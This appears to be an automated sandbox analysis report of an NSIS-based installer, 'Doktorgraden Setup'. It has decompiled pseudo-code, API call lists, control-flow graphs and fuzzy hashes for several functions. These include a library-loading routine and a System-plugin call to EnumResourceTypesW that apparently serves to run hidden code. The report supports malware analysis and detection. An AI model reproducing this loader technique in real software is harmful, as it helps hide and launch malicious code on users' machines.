                                                      				if(_a4 >= 0x7a1ee0 && _a4 - 0x7a1ee0 < 0x800) {
                                                      					_t90 = _a4;
                                                      					_a4 = _a4 & 0x00000000;
                                                      				}
                                                      				while(1) {
                                                      					_t88 =  *_t66;
                                                      					if(_t88 == 0) {
                                                      						break;
                                                      					}
                                                      					__eflags = _t90 - _t39 - 0x400;
                                                      					if(_t90 - _t39 >= 0x400) {
                                                      						break;
                                                      					}
                                                      					_t66 = _t66 + 1;
                                                      					__eflags = _t88 - 4;
                                                      					_a8 = _t66;
                                                      					if(__eflags >= 0) {
                                                      						if(__eflags != 0) {
                                                      							 *_t90 = _t88;
                                                      							_t90 =  &(_t90[1]);
                                                      							__eflags = _t90;
                                                      						} else {
                                                      							 *_t90 =  *_t66;
                                                      							_t90 =  &(_t90[1]);
                                                      							_t66 = _t66 + 1;
                                                      						}
                                                      						continue;
                                                      					}
                                                      					_t41 =  *((char*)(_t66 + 1));
                                                      					_t80 =  *_t66;
                                                      					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                      					_v24 = _t80;
                                                      					_v28 = _t80 | 0x00000080;
                                                      					_v16 = _t41;
                                                      					_v20 = _t41 | 0x00000080;
                                                      					_t66 = _a8 + 2;
                                                      					__eflags = _t88 - 2;
                                                      					if(_t88 != 2) {
                                                      						__eflags = _t88 - 3;
                                                      						if(_t88 != 3) {
                                                      							__eflags = _t88 - 1;
                                                      							if(_t88 == 1) {
                                                      								__eflags = (_t41 | 0xffffffff) - _t97;
                                                      								E00405F9F(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                      							}
                                                      							L42:
                                                      							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                      							_t39 = 0x7a1ee0;
                                                      							continue;
                                                      						}
                                                      						__eflags = _t97 - 0x1d;
                                                      						if(_t97 != 0x1d) {
                                                      							__eflags = "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t97 << 0xa);
                                                      							E00405F7D(_t90, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t97 << 0xa));
                                                      						} else {
                                                      							E00405EDB(_t90,  *0x7a2f48);
                                                      						}
                                                      						__eflags = _t97 + 0xffffffeb - 7;
                                                      						if(_t97 + 0xffffffeb < 7) {
                                                      							L33:
                                                      							E004061E7(_t90);
                                                      						}
                                                      						goto L42;
                                                      					}
                                                      					_t52 =  *0x7a2f4c; // 0x4a62000a
                                                      					__eflags = _t52;
                                                      					_t99 = 2;
                                                      					if(_t52 >= 0) {
                                                      						L13:
                                                      						_a8 = 1;
                                                      						L14:
                                                      						__eflags =  *0x7a2fe4;
                                                      						if( *0x7a2fe4 != 0) {
                                                      							_t99 = 4;
                                                      						}
                                                      						__eflags = _t80;
                                                      						if(__eflags >= 0) {
                                                      							__eflags = _t80 - 0x25;
                                                      							if(_t80 != 0x25) {
                                                      								__eflags = _t80 - 0x24;
                                                      								if(_t80 == 0x24) {
                                                      									GetWindowsDirectoryA(_t90, 0x400);
                                                      									_t99 = 0;
                                                      								}
                                                      								while(1) {
                                                      									__eflags = _t99;
                                                      									if(_t99 == 0) {
                                                      										goto L30;
                                                      									}
                                                      									_t53 =  *0x7a2f44; // 0x706c1370
                                                      									_t99 = _t99 - 1;
                                                      									__eflags = _t53;
                                                      									if(_t53 == 0) {
                                                      										L26:
                                                      										_t55 = SHGetSpecialFolderLocation( *0x7a2f48,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                      										__eflags = _t55;
                                                      										if(_t55 != 0) {
                                                      											L28:
                                                      											 *_t90 =  *_t90 & 0x00000000;
                                                      											__eflags =  *_t90;
                                                      											continue;
                                                      										}
                                                      										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                      										_v12 = _t55;
                                                      										__imp__CoTaskMemFree(_v8);
                                                      										__eflags = _v12;
                                                      										if(_v12 != 0) {
                                                      											goto L30;
                                                      										}
                                                      										goto L28;
                                                      									}
                                                      									__eflags = _a8;
                                                      									if(_a8 == 0) {
                                                      										goto L26;
                                                      									}
                                                      									_t57 =  *_t53( *0x7a2f48,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
                                                      									__eflags = _t57;
                                                      									if(_t57 == 0) {
                                                      										goto L30;
                                                      									}
                                                      									goto L26;
                                                      								}
                                                      								goto L30;
                                                      							}
                                                      							GetSystemDirectoryA(_t90, 0x400);
                                                      							goto L30;
                                                      						} else {
                                                      							E00405E64((_t80 & 0x0000003f) +  *0x7a2f98, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x7a2f98, _t90, _t80 & 0x00000040); // executed
                                                      							__eflags =  *_t90;
                                                      							if( *_t90 != 0) {
                                                      								L31:
                                                      								__eflags = _v16 - 0x1a;
                                                      								if(_v16 == 0x1a) {
                                                      									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                      								}
                                                      								goto L33;
                                                      							}
                                                      							E00405F9F(_t66, _t90, _t99, _t90, _v16);
                                                      							L30:
                                                      							__eflags =  *_t90;
                                                      							if( *_t90 == 0) {
                                                      								goto L33;
                                                      							}
                                                      							goto L31;
                                                      						}
                                                      					}
                                                      					__eflags = _t52 - 0x5a04;
                                                      					if(_t52 == 0x5a04) {
                                                      						goto L13;
                                                      					}
                                                      					__eflags = _v16 - 0x23;
                                                      					if(_v16 == 0x23) {
                                                      						goto L13;
                                                      					}
                                                      					__eflags = _v16 - 0x2e;
                                                      					if(_v16 == 0x2e) {
                                                      						goto L13;
                                                      					} else {
                                                      						_a8 = _a8 & 0x00000000;
                                                      						goto L14;
                                                      					}
                                                      				}
                                                      				 *_t90 =  *_t90 & 0x00000000;
                                                      				if(_a4 == 0) {
                                                      					return _t39;
                                                      				}
                                                      				return E00405F7D(_a4, _t39);
                                                      			}





























                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060CA
                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,004050DC,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000), ref: 004060DD
                                                      • SHGetSpecialFolderLocation.SHELL32(004050DC,75A623A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,004050DC,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000), ref: 00406119
                                                      • SHGetPathFromIDListA.SHELL32(75A623A0,Call), ref: 00406127
                                                      • CoTaskMemFree.OLE32(75A623A0), ref: 00406133
                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406157
                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,004050DC,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00000000,00790EF8,75A623A0), ref: 004061A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                      • API String ID: 717251189-1793055447
                                                      • Opcode ID: bb64b4f7ee53809b8b713d72881a51aa8b5a5b4d150e8921106cb3b28257d830
                                                      • Instruction ID: af1646b593eff3a51ac73f0ed8843f2caf1d37b4bb9fd39580f45c5e5a4eb59e
                                                      • Opcode Fuzzy Hash: bb64b4f7ee53809b8b713d72881a51aa8b5a5b4d150e8921106cb3b28257d830
                                                      • Instruction Fuzzy Hash: 8B61E471904205AEDF119F24CC84BBE7BB59B46314F16813FE903BA2D2D67D4992CB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 774 401759-40177c call 402acb call 405982 779 401786-401798 call 405f7d call 405915 lstrcatA 774->779 780 40177e-401784 call 405f7d 774->780 785 40179d-4017a3 call 4061e7 779->785 780->785 790 4017a8-4017ac 785->790 791 4017ae-4017b8 call 406280 790->791 792 4017df-4017e2 790->792 800 4017ca-4017dc 791->800 801 4017ba-4017c8 CompareFileTime 791->801 793 4017e4-4017e5 call 405af1 792->793 794 4017ea-401806 call 405b16 792->794 793->794 802 401808-40180b 794->802 803 40187e-4018a7 call 4050a4 call 402f9c 794->803 800->792 801->800 804 401860-40186a call 4050a4 802->804 805 40180d-40184f call 405f7d * 2 call 405f9f call 405f7d call 405699 802->805 817 4018a9-4018ad 803->817 818 4018af-4018bb SetFileTime 803->818 815 401873-401879 804->815 805->790 837 401855-401856 805->837 820 402960 815->820 817->818 819 4018c1-4018cc CloseHandle 817->819 818->819 822 4018d2-4018d5 819->822 823 402957-40295a 819->823 825 402962-402966 820->825 826 4018d7-4018e8 call 405f9f lstrcatA 822->826 827 4018ea-4018ed call 405f9f 822->827 823->820 834 4018f2-4022e2 826->834 827->834 838 4022e7-4022ec 834->838 839 4022e2 call 405699 834->839 837->815 840 401858-401859 837->840 838->825 839->838 840->804
                                                      C-Code - Quality: 61%
                                                      			E00401759(FILETIME* __ebx, void* __eflags) {
                                                      				void* _t33;
                                                      				void* _t41;
                                                      				void* _t43;
                                                      				FILETIME* _t49;
                                                      				FILETIME* _t62;
                                                      				void* _t64;
                                                      				signed int _t70;
                                                      				FILETIME* _t71;
                                                      				FILETIME* _t75;
                                                      				signed int _t77;
                                                      				void* _t80;
                                                      				CHAR* _t82;
                                                      				CHAR* _t83;
                                                      				void* _t85;
                                                      
                                                      				_t75 = __ebx;
                                                      				_t82 = E00402ACB(0x31);
                                                      				 *(_t85 - 8) = _t82;
                                                      				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                      				_t33 = E00405982(_t82);
                                                      				_push(_t82);
                                                      				_t83 = "Call";
                                                      				if(_t33 == 0) {
                                                      					lstrcatA(E00405915(E00405F7D(_t83, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize")), ??);
                                                      				} else {
                                                      					E00405F7D();
                                                      				}
                                                      				E004061E7(_t83);
                                                      				while(1) {
                                                      					__eflags =  *(_t85 + 8) - 3;
                                                      					if( *(_t85 + 8) >= 3) {
                                                      						_t64 = E00406280(_t83);
                                                      						_t77 = 0;
                                                      						__eflags = _t64 - _t75;
                                                      						if(_t64 != _t75) {
                                                      							_t71 = _t64 + 0x14;
                                                      							__eflags = _t71;
                                                      							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                      						}
                                                      						asm("sbb eax, eax");
                                                      						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                      						__eflags = _t70;
                                                      						 *(_t85 + 8) = _t70;
                                                      					}
                                                      					__eflags =  *(_t85 + 8) - _t75;
                                                      					if( *(_t85 + 8) == _t75) {
                                                      						E00405AF1(_t83);
                                                      					}
                                                      					__eflags =  *(_t85 + 8) - 1;
                                                      					_t41 = E00405B16(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                      					__eflags = _t41 - 0xffffffff;
                                                      					 *(_t85 - 0xc) = _t41;
                                                      					if(_t41 != 0xffffffff) {
                                                      						break;
                                                      					}
                                                      					__eflags =  *(_t85 + 8) - _t75;
                                                      					if( *(_t85 + 8) != _t75) {
                                                      						E004050A4(0xffffffe2,  *(_t85 - 8));
                                                      						__eflags =  *(_t85 + 8) - 2;
                                                      						if(__eflags == 0) {
                                                      							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                      						}
                                                      						L31:
                                                      						 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t85 - 4));
                                                      						__eflags =  *0x7a2fe8;
                                                      						goto L32;
                                                      					} else {
                                                      						E00405F7D(0x40abe8, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)");
                                                      						E00405F7D("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", _t83);
                                                      						E00405F9F(_t75, 0x40abe8, _t83, "C:\Users\Arthur\AppData\Local\Temp\nse224D.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                      						E00405F7D("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40abe8);
                                                      						_t62 = E00405699("C:\Users\Arthur\AppData\Local\Temp\nse224D.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                      						__eflags = _t62;
                                                      						if(_t62 == 0) {
                                                      							continue;
                                                      						} else {
                                                      							__eflags = _t62 == 1;
                                                      							if(_t62 == 1) {
                                                      								 *0x7a2fe8 =  &( *0x7a2fe8->dwLowDateTime);
                                                      								L32:
                                                      								_t49 = 0;
                                                      								__eflags = 0;
                                                      							} else {
                                                      								_push(_t83);
                                                      								_push(0xfffffffa);
                                                      								E004050A4();
                                                      								L29:
                                                      								_t49 = 0x7fffffff;
                                                      							}
                                                      						}
                                                      					}
                                                      					L33:
                                                      					return _t49;
                                                      				}
                                                      				E004050A4(0xffffffea,  *(_t85 - 8));
                                                      				 *0x7a3014 =  *0x7a3014 + 1;
                                                      				_push(_t75);
                                                      				_push(_t75);
                                                      				_push( *(_t85 - 0xc));
                                                      				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                      				_t43 = E00402F9C(); // executed
                                                      				 *0x7a3014 =  *0x7a3014 - 1;
                                                      				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                      				_t80 = _t43;
                                                      				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                      					L22:
                                                      					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                      				} else {
                                                      					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                      					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                      						goto L22;
                                                      					}
                                                      				}
                                                      				CloseHandle( *(_t85 - 0xc)); // executed
                                                      				__eflags = _t80 - _t75;
                                                      				if(_t80 >= _t75) {
                                                      					goto L31;
                                                      				} else {
                                                      					__eflags = _t80 - 0xfffffffe;
                                                      					if(_t80 != 0xfffffffe) {
                                                      						E00405F9F(_t75, _t80, _t83, _t83, 0xffffffee);
                                                      					} else {
                                                      						E00405F9F(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                      						lstrcatA(_t83,  *(_t85 - 8));
                                                      					}
                                                      					_push(0x200010);
                                                      					_push(_t83);
                                                      					E00405699();
                                                      					goto L29;
                                                      				}
                                                      				goto L33;
                                                      			}


















                                                      APIs
                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,00000000,00000000,00000031), ref: 00401798
                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,00000000,00000000,00000031), ref: 004017C2
                                                        • Part of subcall function 00405F7D: lstrcpynA.KERNEL32(?,?,00000400,004032BB,Doktorgraden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F8A
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000,?), ref: 004050DD
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000), ref: 004050ED
                                                        • Part of subcall function 004050A4: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,004030D4,004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0), ref: 00405100
                                                        • Part of subcall function 004050A4: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405112
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405138
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405152
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nse224D.tmp$C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                      • API String ID: 1941528284-3487299283
                                                      • Opcode ID: 67287745aee8bdf74e8a1c0408434e65486f79d0b620527e9253d6af820af06e
                                                      • Instruction ID: 3f5d23f0505a0c405a30723695d383d48bc8799a0a07943a114376d49cde1fe8
                                                      • Opcode Fuzzy Hash: 67287745aee8bdf74e8a1c0408434e65486f79d0b620527e9253d6af820af06e
                                                      • Instruction Fuzzy Hash: B841B471900519BACF10BBB5CC46DAF76B9DF41368B20823BF522F11E1D67C8A419A6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 841 4050a4-4050b9 842 40516f-405173 841->842 843 4050bf-4050d1 841->843 844 4050d3-4050d7 call 405f9f 843->844 845 4050dc-4050e8 lstrlenA 843->845 844->845 847 405105-405109 845->847 848 4050ea-4050fa lstrlenA 845->848 850 405118-40511c 847->850 851 40510b-405112 SetWindowTextA 847->851 848->842 849 4050fc-405100 lstrcatA 848->849 849->847 852 405162-405164 850->852 853 40511e-405160 SendMessageA * 3 850->853 851->850 852->842 854 405166-405169 852->854 853->852 854->842
                                                      C-Code - Quality: 100%
                                                      			E004050A4(CHAR* _a4, CHAR* _a8) {
                                                      				struct HWND__* _v8;
                                                      				signed int _v12;
                                                      				CHAR* _v32;
                                                      				long _v44;
                                                      				int _v48;
                                                      				void* _v52;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				CHAR* _t26;
                                                      				signed int _t27;
                                                      				CHAR* _t28;
                                                      				long _t29;
                                                      				signed int _t39;
                                                      
                                                      				_t26 =  *0x7a2724; // 0x1040e
                                                      				_v8 = _t26;
                                                      				if(_t26 != 0) {
                                                      					_t27 =  *0x7a3014;
                                                      					_v12 = _t27;
                                                      					_t39 = _t27 & 0x00000001;
                                                      					if(_t39 == 0) {
                                                      						E00405F9F(0, _t39, 0x79ed20, 0x79ed20, _a4);
                                                      					}
                                                      					_t26 = lstrlenA(0x79ed20);
                                                      					_a4 = _t26;
                                                      					if(_a8 == 0) {
                                                      						L6:
                                                      						if((_v12 & 0x00000004) == 0) {
                                                      							_t26 = SetWindowTextA( *0x7a2708, 0x79ed20); // executed
                                                      						}
                                                      						if((_v12 & 0x00000002) == 0) {
                                                      							_v32 = 0x79ed20;
                                                      							_v52 = 1;
                                                      							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                                      							_v44 = 0;
                                                      							_v48 = _t29 - _t39;
                                                      							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                                      							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                                      						}
                                                      						if(_t39 != 0) {
                                                      							_t28 = _a4;
                                                      							 *((char*)(_t28 + 0x79ed20)) = 0;
                                                      							return _t28;
                                                      						}
                                                      					} else {
                                                      						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                      						if(_t26 < 0x800) {
                                                      							_t26 = lstrcatA(0x79ed20, _a8);
                                                      							goto L6;
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t26;
                                                      			}


















                                                      APIs
                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000,?), ref: 004050DD
                                                      • lstrlenA.KERNEL32(004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000), ref: 004050ED
                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,004030D4,004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0), ref: 00405100
                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405112
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405138
                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405152
                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll
                                                      • API String ID: 2531174081-3047286350
                                                      • Opcode ID: 0e5bc111e7764b859d703c7cd38c1a52b54818a96c636b509d6d72182c6d6877
                                                      • Instruction ID: 0aa0aab3041eb49126eaccb75638caacaba84434fae24d46564a95eb40ba5f91
                                                      • Opcode Fuzzy Hash: 0e5bc111e7764b859d703c7cd38c1a52b54818a96c636b509d6d72182c6d6877
                                                      • Instruction Fuzzy Hash: 85219D71D00518BEDF119FA5DD81ADFBFA9EB45354F14807AF504BA291C7388E418FA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 855 402003-40200f 856 402015-40202b call 402acb * 2 855->856 857 4020ca-4020cc 855->857 866 40203a-402048 LoadLibraryExA 856->866 867 40202d-402038 GetModuleHandleA 856->867 859 40223d-402242 call 401423 857->859 864 402957-402966 859->864 869 40204a-402057 GetProcAddress 866->869 870 4020c3-4020c5 866->870 867->866 867->869 872 402096-40209b call 4050a4 869->872 873 402059-40205f 869->873 870->859 877 4020a0-4020a3 872->877 875 402061-40206d call 401423 873->875 876 402078-40208f call 706b16db 873->876 875->877 885 40206f-402076 875->885 879 402091-402094 876->879 877->864 880 4020a9-4020b1 call 40374b 877->880 879->877 880->864 886 4020b7-4020be FreeLibrary 880->886 885->877 886->864
                                                      C-Code - Quality: 60%
                                                      			E00402003(void* __ebx, void* __eflags) {
                                                      				struct HINSTANCE__* _t18;
                                                      				struct HINSTANCE__* _t26;
                                                      				void* _t27;
                                                      				struct HINSTANCE__* _t30;
                                                      				CHAR* _t32;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				_t27 = __ebx;
                                                      				asm("sbb eax, 0x7a3018");
                                                      				 *(_t34 - 4) = 1;
                                                      				if(__eflags < 0) {
                                                      					_push(0xffffffe7);
                                                      					L15:
                                                      					E00401423();
                                                      					L16:
                                                      					 *0x7a2fe8 =  *0x7a2fe8 +  *(_t34 - 4);
                                                      					return 0;
                                                      				}
                                                      				_t32 = E00402ACB(0xfffffff0);
                                                      				 *(_t34 + 8) = E00402ACB(1);
                                                      				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                      					L3:
                                                      					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                      					_t30 = _t18;
                                                      					if(_t30 == _t27) {
                                                      						_push(0xfffffff6);
                                                      						goto L15;
                                                      					}
                                                      					L4:
                                                      					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                      					if(_t33 == _t27) {
                                                      						E004050A4(0xfffffff7,  *(_t34 + 8));
                                                      					} else {
                                                      						 *(_t34 - 4) = _t27;
                                                      						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                      							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40b828, "\xef\xbf\xbd/z");
                                                      						} else {
                                                      							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                      							if( *_t33() != 0) {
                                                      								 *(_t34 - 4) = 1;
                                                      							}
                                                      						}
                                                      					}
                                                      					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040374B(_t30) != 0) {
                                                      						FreeLibrary(_t30);
                                                      					}
                                                      					goto L16;
                                                      				}
                                                      				_t26 = GetModuleHandleA(_t32); // executed
                                                      				_t30 = _t26;
                                                      				if(_t30 != __ebx) {
                                                      					goto L4;
                                                      				}
                                                      				goto L3;
                                                      			}











                                                      APIs
                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000,?), ref: 004050DD
                                                        • Part of subcall function 004050A4: lstrlenA.KERNEL32(004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0,?,?,?,?,?,?,?,?,?,004030D4,00000000), ref: 004050ED
                                                        • Part of subcall function 004050A4: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,004030D4,004030D4,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,00000000,00790EF8,75A623A0), ref: 00405100
                                                        • Part of subcall function 004050A4: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405112
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405138
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405152
                                                        • Part of subcall function 004050A4: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405160
                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                      • String ID: kernel32::EnumResourceTypesW(i 0,i r1,i 0)$/z
                                                      • API String ID: 2987980305-3189396245
                                                      • Opcode ID: f07efcf14706e6a2f0d750d3bb31d1f1e0453dcd1a147c1158aded7e7778b7b7
                                                      • Instruction ID: d65959635370e5528591cca9a5c3cbe7578547ab5d5b00e4bd8bf8e39d7723e8
                                                      • Opcode Fuzzy Hash: f07efcf14706e6a2f0d750d3bb31d1f1e0453dcd1a147c1158aded7e7778b7b7
                                                      • Instruction Fuzzy Hash: 8121D871A00215BBCF207FA48E4DBAE76A0AF55318F20413BF611B21D0CBBD4A42D66E
